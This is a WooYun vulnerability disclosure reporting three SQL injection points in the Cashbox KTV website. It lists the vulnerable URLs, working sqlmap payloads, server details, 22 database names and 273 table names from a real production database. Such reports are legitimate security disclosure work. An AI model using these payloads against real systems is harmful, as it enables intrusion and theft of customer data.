当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0122951

漏洞标题:钱柜官方网站三处SQL注入(影响多个数据库)

相关厂商:钱柜

漏洞作者: 路人甲

提交时间:2015-06-26 17:19

修复时间:2015-08-10 17:20

公开时间:2015-08-10 17:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-26: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-08-10: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT,三处sql注入

详细说明:

第一处:

http://www.cashboxparty.com/star/star_basicdata.asp?sid=22
sid参数


第二处:

http://www.cashboxparty.com/star/star_excl.asp?sid=22
sid参数


第三处

http://www.cashboxparty.com/star/star_newdisk.asp?sid=22
sid参数


qg.jpg


其中包含多个数据库

漏洞证明:

sqlmap identified the following injection points with a total of 47 HTTP(s) requests:
---
Parameter: sid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sid=22' AND 2660=2660 AND 'oGdD'='oGdD
Vector: AND [INFERENCE]
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sid=22' AND 8270=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8270=8270) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(98)+CHAR(113))) AND 'rABW'='rABW
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
Type: UNION query
Title: Generic UNION query (NULL) - 19 columns
Payload: sid=22' UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113)+CHAR(117)+CHAR(85)+CHAR(111)+CHAR(83)+CHAR(108)+CHAR(81)+CHAR(77)+CHAR(86)+CHAR(112)+CHAR(119)+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Vector: UNION ALL SELECT [QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2008
current user: 'cbwebuser'
current database: 'chian'
current user is DBA: False
available databases [22]:
[*] BookingCRM
[*] CallCenter
[*] Cashbox
[*] CashBoxParty
[*] CBMember
[*] chian
[*] dblog
[*] diamond
[*] EDM
[*] EipCB
[*] FaceBook
[*] InvestorInfo
[*] KTVEmp
[*] master
[*] model
[*] msdb
[*] official
[*] Platinum
[*] SMS
[*] StoreSMS
[*] tempdb
[*] TESTSMSDB
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: sid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sid=22' AND 2660=2660 AND 'oGdD'='oGdD
Vector: AND [INFERENCE]
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sid=22' AND 8270=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8270=8270) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(98)+CHAR(113))) AND 'rABW'='rABW
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
Type: UNION query
Title: Generic UNION query (NULL) - 19 columns
Payload: sid=22' UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113)+CHAR(117)+CHAR(85)+CHAR(111)+CHAR(83)+CHAR(108)+CHAR(81)+CHAR(77)+CHAR(86)+CHAR(112)+CHAR(119)+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Vector: UNION ALL SELECT [QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2008
Database: chian
[273 tables]
+-------------------------------+
| adboard |
| Act_100M |
| Act_96122_Ans |
| Act_96122_Coupon |
| Act_96122_Item |
| Act_96122_Q |
| Act_97014_Draw |
| Act_Coupon_1Hr |
| Act_Lottery |
| Act_Lyrics_Del |
| Act_Lyrics_Del |
| Act_Meal_Item |
| Act_Meal_Vote |
| CTVSuperStarList |
| China_Act_Elva_Member_Del |
| China_Act_Elva_Member_Del |
| China_Act_Elva_Vote |
| D99_CMD |
| D99_REG |
| D99_Tmp |
| DiamondGF |
| DiamondPoint |
| Diff_Member |
| Event_survey |
| ForiegnBillboard1_1109 |
| ForiegnBillboard1_1109 |
| ForiegnBillboard1bak |
| ForiegnBillboard2_1109 |
| ForiegnBillboard2_1109 |
| ForiegnBillboard2bak2 |
| ForiegnBillboard2bak2 |
| Forum |
| GF_Info1_Business |
| GF_Info1_Business |
| GameAnswer |
| GameCoverPrize |
| GameCoverPrize |
| GameCoverVote |
| GameGate |
| GameInfo |
| GameJoin |
| GamePicMem |
| GamePicPath |
| GamePicPrize |
| GamePicVote |
| Game_Draw |
| Game_Name |
| Game_Prize_Name |
| Game_Prize_Store |
| GenericErrorLog |
| HR_ZIPCODEDETAIL |
| HR_ZIPCODEDETAIL |
| HR_ZIPCODEMASTER |
| HR_ZIPCODE_V |
| HackLog |
| IndexPic |
| IndexSong |
| IndexTitle |
| Job_Admin |
| Job_Education |
| Job_Family |
| Job_Licence |
| Job_Login_Log |
| Job_Mail_Sample |
| Job_Parameter |
| Job_Recruit |
| Job_Resume |
| Job_Title |
| Job_Vacancy |
| Job_Work |
| Job_ZipCodeDetail |
| Job_ZipCodeDetail |
| Job_ZipCodeMaster |
| Job_ZipCode_v |
| KNowBySongerSearchCount |
| Ktv_Act_Block |
| Ktv_Act_Dept |
| Ktv_Act_Setup_Dept |
| Ktv_Act_Setup_Dept |
| Ktv_Act_Title |
| LNetIn_Join |
| LNetIn_Join |
| LoginKeysLog |
| LoginKeysLog |
| MSNSongDataBySmartPhone |
| MSN_SongData1 |
| MSN_SongData1 |
| MemberInfoUpdateLogByWebSite |
| MobileWebOperator |
| MyFriends_MMS |
| MyFriends_MMS |
| MyPartyMessageLog |
| MyPartyMessageLog |
| My_DiningCar_Old |
| My_DiningCar_Old |
| My_PartyMessage |
| NetInBase |
| NetInDetail |
| NetInSubmission |
| NetinDrawResult |
| NewStar2005_Main |
| NewStar2005_SecID |
| NewStar2005_SecSong |
| NewStar2005_Sort |
| NewStar2005_Vote_Deceive_Stop |
| NewStar2005_Vote_Deceive_Stop |
| NewStar2005_Vote_NameList |
| OrderSongsLog |
| OrderSongsLog |
| ProcessFiles |
| Rose_Card |
| Rose_Dept |
| SearchSongDataExecuteLog |
| Sel_Member |
| SellToolsAgressByMember |
| SellToolsInfo |
| SongKinds |
| SongerNameByWiki |
| Songs_3456 |
| SpecialRoom_Service_EMail |
| SysAuditResult |
| SysExecType |
| SysExecuteID |
| SysVideoType |
| TempSongerInfo |
| Tmp_Web_Menu |
| TransformChinaChar |
| VideoInfoByTypeID |
| VideoInfoByTypeID |
| VideoJobExecuteStatus |
| WebCouponDownLoadGather |
| WebDiningCarMenu_old |
| WebDiningCarMenu_old |
| WebDiningCar_Detail |
| WebDiningCar_Head |
| WebDiningCar_SubDetail |
| WebMemberSMSValidate |
| WebSecurityDetail |
| WebSecurityHead |
| Women_Order |
| Women_Song |
| X_2627 |
| X_3547 |
| X_3898 |
| X_4010 |
| X_5298 |
| X_5730 |
| X_6993 |
| X_7337 |
| X_7743 |
| X_7999 |
| X_8562 |
| e-coupon |
| aaa012701 |
| aaa021201 |
| act_2006party_card |
| act_2006party_card |
| act_2006party_starid |
| act_cd200 |
| act_coupon_printlog |
| act_ecoupon_ipview |
| act_ecoupon_pageview |
| act_jaycoupon |
| act_kao_draw |
| act_kao_open_prize |
| act_kao_prize |
| act_ksong_apply |
| act_ksong_game |
| act_ksong_vote |
| act_moodstory_end |
| act_moodstory_end |
| act_rdate_report |
| ad_news_onclick |
| ad_onclick |
| cb_newsongday |
| cbweb_counter |
| coupon060426_record |
| coupon060426_record |
| coupon060701a_record |
| coupon060701a_record |
| diamond_store |
| discussion_post |
| discussion_topics |
| dog_photo |
| dog_puzzle |
| dog_vote_deceive_stop |
| dog_vote_deceive_stop |
| dog_vote_item |
| dtproperties |
| event_Chang |
| event_Guess |
| event_PAPA_VoteIP |
| event_PAPA_VoteIP |
| event_PAPA_VoteIP |
| event_PAPA_backup |
| event_PAPAid |
| event_SendCard |
| foofoofoo |
| friend_save |
| goolitxt_superuser |
| goolitxt_superuser |
| goolitxt_vote |
| homepage |
| hr_zipcode_t |
| hr_zipcodedetail_t |
| hr_zipcodemaster_t |
| imode_song_history |
| imode_song_history |
| itv_box |
| itv_box |
| itv_kanban |
| ktv_hotnews |
| ktv_room |
| love99 |
| magazine |
| mem_addr |
| mem_area_old |
| mem_area_old |
| mem_career |
| mem_cash |
| mem_rdate_mms |
| mem_rdate_mms |
| mem_zipcode |
| member_booking |
| member_booking |
| member_web |
| mg_Topic |
| mgpic |
| music_media_cd |
| music_media_song |
| mv_home |
| new_ma_users |
| news |
| newstar2006_batch |
| newstar2006_group |
| newstar2006_namelist |
| newstar2006_random |
| page_record |
| recomAlbum |
| service_email |
| songs1123 |
| songs1123 |
| songsDelete |
| songsNew0619 |
| songsNew0619 |
| songsNewbak |
| songs_MyRoomSong_Old |
| songs_MyRoomSong_Old |
| songs_SongType |
| songs_billboard_rock_log |
| songs_billboard_rockxml |
| songs_jp |
| songs_lang2 |
| songs_lang2 |
| songs_mv |
| songs_mysong |
| songs_rock |
| songs_temp |
| songsbillboard1019 |
| songsbillboard1019 |
| songsbillboardbak |
| songsnew0831 |
| star_basicdata |
| star_disk_photo |
| star_disk_photo |
| star_excl |
| star_photo |
| star_rock |
| star_route |
| subhome_diamond |
| subtitles_subtype |
| subtitles_subtype |
| sysdiagrams |
+-------------------------------+

修复方案:

参数过滤,尽快修复吧

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝